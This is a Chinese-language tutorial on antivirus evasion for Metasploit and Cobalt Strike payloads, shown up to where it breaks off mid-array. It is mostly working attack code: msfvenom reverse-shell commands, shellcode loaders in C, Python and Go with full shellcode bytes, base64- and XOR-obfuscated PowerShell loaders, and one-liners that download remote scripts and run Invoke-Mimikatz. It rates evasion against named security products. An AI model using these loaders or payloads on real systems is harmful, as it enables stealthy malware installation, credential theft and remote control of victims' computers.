免杀小办法
# 免杀小办法
老婆镇楼(夹带私货)
python
#加载器选择-ctypes-DLL引用&执行C代码
方法一: python ctype模块 免杀应用
注意py必须是3.7或者以下的
应用DLL载入执行:(载入DLL进行DLL代码函数调用执行)
C++:
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include<stdio.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern "C" _declspec(dllexport) void TestCtypes() {
printf("I like eating watermelon\n");
}
使用py载入给个生成的dll文件,代码如下
Python:
from ctypes import *
#加载dll2.dll
lib=CDLL('dll2')
#调用当前库方法
lib.TestCtypes()
2.应用C-Payload执行:(利用Python加载执行C语言Payload)
申请内存空间,创建shellcode的函数指针,创建线程,执行:
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
3.打包器选择-C语言编译-MSF-C-电脑管家
打包器选择-pyinstaller&py2exe
1、管家各种过-火绒 defender查杀
msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=6688 -f c
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6688
run
VS创建项目,添加C语言文件,添加执行代码并替换Shellcode,编译生成
#include <Windows.h>
#include <stdio.h>
#include <string.h>
#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x2f\x5e\xec\x75\x68\x02"
"\x00\x1a\x20\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
"\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
main()
{
char* Memory;
Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}
4.加密器选择-Python编译-MSF-C-bs64-Defender
可选择其他加密方式,只要识别不出来就ok了
加密器选择-base64&hex&xor&aes
利用思路:将Payload进行编码生成,Python解码后调用执行绕过。
pyinstaller打包-defender
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=xxx.xxx.xxx.xxx lport=6688 -f c
Pycharm调用Ctypes模块解码调用C
pyinstaller.exe -F -w ms-py.py
import ctypes
import base64
encode_shellcode = '''\x2f\x4f\x69\x50\x41\x41\x41\x41\x59\x44\x48\x53\x5a\x49\x74
\x53\x4d\x49\x74\x53\x44\x49\x74\x53\x46\x49\x6e\x6c\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x4d\x63\x43\x73\x50
\x47\x46\x38\x41\x69\x77\x67\x77\x63\x38\x4e\x41\x63\x64\x4a
\x64\x65\x39\x53\x56\x34\x74\x53\x45\x49\x74\x43\x50\x41\x48
\x51\x69\x30\x42\x34\x68\x63\x42\x30\x54\x41\x48\x51\x69\x31
\x67\x67\x41\x64\x4f\x4c\x53\x42\x68\x51\x68\x63\x6c\x30\x50
\x45\x6d\x4c\x4e\x49\x73\x42\x31\x6a\x48\x2f\x4d\x63\x43\x73
\x77\x63\x38\x4e\x41\x63\x63\x34\x34\x48\x58\x30\x41\x33\x33
\x34\x4f\x33\x30\x6b\x64\x65\x42\x59\x69\x31\x67\x6b\x41\x64
\x4e\x6d\x69\x77\x78\x4c\x69\x31\x67\x63\x41\x64\x4f\x4c\x42
\x49\x73\x42\x30\x49\x6c\x45\x4a\x43\x52\x62\x57\x32\x46\x5a
\x57\x6c\x48\x2f\x34\x46\x68\x66\x57\x6f\x73\x53\x36\x59\x44
\x2f\x2f\x2f\x39\x64\x61\x44\x4d\x79\x41\x41\x42\x6f\x64\x33
\x4d\x79\x58\x31\x52\x6f\x54\x48\x63\x6d\x42\x34\x6e\x6f\x2f
\x39\x43\x34\x6b\x41\x45\x41\x41\x43\x6e\x45\x56\x46\x42\x6f
\x4b\x59\x42\x72\x41\x50\x2f\x56\x61\x67\x70\x6f\x4c\x31\x37
\x73\x64\x57\x67\x43\x41\x42\x6f\x67\x69\x65\x5a\x51\x55\x46
\x42\x51\x51\x46\x42\x41\x55\x47\x6a\x71\x44\x39\x2f\x67\x2f
\x39\x57\x58\x61\x68\x42\x57\x56\x32\x69\x5a\x70\x58\x52\x68
\x2f\x39\x57\x46\x77\x48\x51\x4b\x2f\x30\x34\x49\x64\x65\x7a
\x6f\x5a\x77\x41\x41\x41\x47\x6f\x41\x61\x67\x52\x57\x56\x32
\x67\x43\x32\x63\x68\x66\x2f\x39\x57\x44\x2b\x41\x42\x2b\x4e
\x6f\x73\x32\x61\x6b\x42\x6f\x41\x42\x41\x41\x41\x46\x5a\x71
\x41\x47\x68\x59\x70\x46\x50\x6c\x2f\x39\x57\x54\x55\x32\x6f
\x41\x56\x6c\x4e\x58\x61\x41\x4c\x5a\x79\x46\x2f\x2f\x31\x59
\x50\x34\x41\x48\x30\x6f\x57\x47\x67\x41\x51\x41\x41\x41\x61
\x67\x42\x51\x61\x41\x73\x76\x44\x7a\x44\x2f\x31\x56\x64\x6f
\x64\x57\x35\x4e\x59\x66\x2f\x56\x58\x6c\x37\x2f\x44\x43\x51
\x50\x68\x58\x44\x2f\x2f\x2f\x2f\x70\x6d\x2f\x2f\x2f\x2f\x77
\x48\x44\x4b\x63\x5a\x31\x77\x63\x4f\x37\x38\x4c\x57\x69\x56
\x6d\x6f\x41\x55\x2f\x2f\x56
'''
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
#加密器选择-Python编译-MSF-C-无Payload-火绒(俗称无文件落地技术)
利用思路:将Payload存放互联网资源上,通过爬虫获取后再进行编码,后续通过定位特征码形式找到关键代码查杀块,继续编码绕过。
pyinstaller打包-defender
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=xxx.xxx.xxx.xxx lport=6688 -f c
Pycharm调用Ctypes模块解码调用C
pyinstaller.exe -F -w ms-py-2.py
import ctypes
import requests
import base64
encode_shellcode = requests.get("http://xxx.xxx.xxx.xxx/123.txt").text
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
func=base64.b64decode(b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSk=')
exec(func)
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
windows powershell 免杀
若脚本执行出错,则在pwoershell中运行:set-ExecutionPolicy RemoteSigned,再选择Y即可
过不了windows defender,能过某绒,某60,某讯管家
Set-StrictMode -Version 2
$DoIt = @'
ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kdWxlKSkpKSwgJHZhcl9wcm9jZWR1cmUpKQp9CgpmdW5jdGlvbiBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlX2J1aWxkZXIuQ3JlYXRlVHlwZSgpCn0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2t0UFBTTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0o5RXR6MkV0eDBTU1J5ZFhOTGxIVERLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNVjNKbmNDTTY5aUhKYmJzMFY4dE5lZisrTVpMWTRqMmgwTkpDS3ZhQVJ6cDNpOGlaMlRtR2haRXZQN1NMREFzb2h2cTB5MTdPMytGNnZjWCsxZWZ3cXlOR1NVSzB3YXNUY0duelN6cHRJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRncwVEF3dEFURTVUUWxkS1FVOUdHQU51Y0dwbUF4UU5FeGdEZEVwTlIweFVVQU50ZHdNV0RSSVlBM2RSU2tkR1RWY01GdzBUR0FNTmJXWjNBMkJ2Y1FNUkRSTU5GaE1VRVJRS0xpa2pMeEN5TGIxTnpmTzNrUXYvbkZxYnd4L0NUc0VWb09jZ25EcFBuMkZ0bVQwSnVMeGdxTHBPdWZraEZwMG5qbWIvTE5Za1RzblZXbGZFKzN5Wmp0a3h6dlNGQ0lwOHhLRVkrK25peGRCbFNhY2JMV1pvQy9xSkQveG1TSm9LZTdrRFZXOG9EVVhid0YwTld5aVBURGVyTkorZFdYOWd0UkxOM3YyVlNLcGdWYlNjVVYzNVhPYkFRTTZUTjQ0VXB4RER3enRhSzZLWmlrT0xFbnFwSFJWZTVzSm1sNXMyV20yeEZIblBGdEJ5Qjl0VSt5MzBocDRSK2hJMDhSTW1adjNWQnFhVFI4Vkd2OEpCeThnVWd5TkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNFaEVURFJFV0RSRVdFdzBYR2lNeEYzVmInKQoKZm9yICgkeCA9IDA7ICR4IC1sdCAkdmFyX2NvZGUuQ291bnQ7ICR4KyspIHsKCSR2YXJfY29kZVskeF0gPSAkdmFyX2NvZGVbJHhdIC1ieG9yIDM1Cn0KCiR2YXJfdmEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWxsb2MpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pKSkKJHZhcl9idWZmZXIgPSAkdmFyX3ZhLkludm9rZShbSW50UHRyXTo6WmVybywgJHZhcl9jb2RlLkxlbmd0aCwgMHgzMDAwLCAweDQwKQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCR2YXJfY29kZSwgMCwgJHZhcl9idWZmZXIsICR2YXJfY29kZS5sZW5ndGgpCgokdmFyX3J1bm1lID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJHZhcl9idWZmZXIsIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0pIChbVm9pZF0pKSkKJHZhcl9ydW5tZS5JbnZva2UoW0ludFB0cl06Olplcm8p
'@
$xd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt))
If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $xd | wait-job | Receive-Job
}
else {
IEX $xd
}
无文件落地,这个啥都过不了
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx/cc.ps1'))"
替换文件名:过某绒,过某60,加载到内存执行,不考虑代码的免杀性
powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://www.xiaodi8.com/ms/ps/1.ps1''));Invoke-Mimikatz';IEX ($a+$b)"
copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt
bypass.txt -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx/cc.ps1'))"
切割一下,会报错但仍然会执行,可过某60
bypass.txt "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://xxx.xxx.xxx.xxx/cc.ps1''));Invoke-Mimikatz';IEX ($a+$b)"
垃圾数据干扰,可以过某绒,过不了某60
powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://xxx.xxx.xxx.xxx/cc.ps1')
替换关键字:
powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://www.xiaodi8.com/ms/ps/payload.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"
混淆无文件:
无文件:
$DoIt=IEX ((new-objectnet.webclient).downloadstring('http://xxxx/ms/ps/1.ps1'))
编码:
$xd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String())
配合项目+远程文件加载(即无文件落地可以实现Defeder的绕过)
#本地执行代码-工具混淆
Invoke-Obfuscation
https://github.com/danielbohannon/Invoke-Obfuscation
安装使用:
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation
处理文件:set scriptpath C:\Users\86135\Desktop\1.ps1
处理代码:set scriptblock 'xxxx'
进入编码:encoding
选择编码:1-8
输出文件:out C:\Users\86135\Desktop\11.ps1
go免杀章节
Golang调用C-ShellCode
先用CS生成C语言的payload
/* length: 892 bytes */
unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x6c\x1e\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x61\x44\x42\x76\x00\x69\x48\x4a\x00\x46\xb0\x41\x65\xaa\xb9\xf6\xdb\x15\x35\x9f\x57\xb0\x84\x5a\x19\xd4\x10\xdb\x36\xe8\xa0\x6d\x9b\xe1\x37\x40\xb8\xb6\x84\xb9\xae\xdb\x0c\x3e\x4c\x40\x58\x0a\x83\x45\xbc\x37\x7d\x2a\x4e\x64\x15\x7f\x7d\x67\xa6\x1b\x91\x36\xfb\x3d\x2d\x50\xb1\x31\xf5\x19\xda\x90\x3a\x67\xcc\x06\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x55\x48\x53\x29\x0d\x0a\x00\xe2\x8b\x7b\xd2\xca\x55\xe1\x98\xa8\x6c\xb9\x4c\xc4\xdd\x8e\xef\x2d\xd6\x66\x44\xcc\x86\x9e\x8d\x4c\x5f\x9b\x81\xc2\x0f\x7c\xc4\x3f\xcb\x8c\x60\xd0\x72\x21\xc1\xc9\x62\xb4\x6b\xb3\x21\x73\xd0\x7a\xef\xba\x6c\x94\x5a\x4a\x0c\xbf\x09\x30\x96\xfa\x22\x70\x2a\x4e\x8f\x55\x87\xe1\xe9\xdf\x8d\x6a\x1d\x0e\x3c\x9f\xad\x17\x76\x5e\x54\x51\xcd\x74\xa0\x63\xd4\x82\xb4\xd8\x80\x98\xb7\x20\xa6\x11\xc0\x9e\xd5\xee\x8e\x16\x00\x12\x53\xfd\xd5\x05\xd1\x07\x8e\x7d\x1a\xef\x0d\xda\xd6\xf7\x13\xec\x97\x4e\xd7\xec\x38\x6d\xe5\x71\x9c\x09\x94\xf8\x25\xa1\x3e\x74\x82\x67\x17\x4f\x24\x92\xba\x4c\x42\x46\x5b\x29\xdf\x7e\x13\x01\xfb\xae\xde\xdc\xf2\xf3\x9f\x99\x94\xb6\x5d\x57\x77\x8b\x9c\x79\xeb\xef\xaf\xdd\xdf\x5e\xde\x7e\x4a\xd9\x11\x03\xda\x62\x18\x11\x54\x96\xbf\x6b\x9f\xaa\xc6\x8d\xc9\xfd\x90\x12\x3b\x6c\x88\x10\x00\x31\xe8\x2e\x5d\xae\x09\x60\xfb\x9d\x5b\xbd\x64\xd1\xa3\xd3\x61\x8d\xac\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x32\x30\x2e\x32\x35\x2e\x32\x35\x30\x2e\x34\x39\x00\x12\x34\x56\x78";
修改格式将\修改位,0
再代入到go中
package main
import (
"io/ioutil"
"os"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
shellcode_buf = []byte{
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x75,0x72,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x00,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0